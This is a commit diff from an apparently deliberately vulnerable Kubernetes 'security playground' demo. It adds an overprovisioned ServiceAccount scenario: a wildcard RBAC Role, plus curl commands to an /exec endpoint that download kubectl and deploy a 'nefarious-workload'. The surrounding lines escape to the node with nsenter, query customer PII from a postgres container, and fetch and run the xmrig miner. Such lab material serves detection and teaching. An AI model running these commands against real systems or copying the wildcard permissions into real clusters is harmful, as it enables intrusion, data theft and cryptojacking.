Skip to content

Commit 55a402c

Browse files
jasonumiker-sysdigjasonumiker-sysdig
committed
Added overprovisioned service-account scenario
1 parent 4e9ba8b commit 55a402c

File tree

2 files changed

+32
-2
lines changed

2 files changed

+32
-2
lines changed

example-curls.sh

Lines changed: 8 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,13 @@ echo "6. Exfil some data from another container running on the same Node"
2828
POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
2929
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
3030

31-
echo "7. Exploit running a script to run a crypto miner"
31+
echo "7. Call the Kubernetes API via security-playground's K8s ServiceAccount"
32+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.26.4/2023-05-11/bin/linux/amd64/kubectl'
33+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
34+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:110623'
35+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
36+
37+
echo "8. Exploit running a script to run a crypto miner"
3238
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
3339
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
34-
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
40+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'

security-playground.yaml

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -3,6 +3,30 @@ kind: Namespace
33
metadata:
44
name: security-playground
55
---
6+
apiVersion: rbac.authorization.k8s.io/v1
7+
kind: Role
8+
metadata:
9+
name: default
10+
namespace: security-playground
11+
rules:
12+
- apiGroups: ["*"]
13+
resources: ["*"]
14+
verbs: ["*"]
15+
---
16+
apiVersion: rbac.authorization.k8s.io/v1
17+
kind: RoleBinding
18+
metadata:
19+
name: default
20+
namespace: security-playground
21+
subjects:
22+
- kind: ServiceAccount
23+
name: default
24+
namespace: security-playground
25+
roleRef:
26+
kind: Role
27+
name: default
28+
apiGroup: rbac.authorization.k8s.io
29+
---
630
apiVersion: apps/v1
731
kind: Deployment
832
metadata:

0 commit comments

Comments
 (0)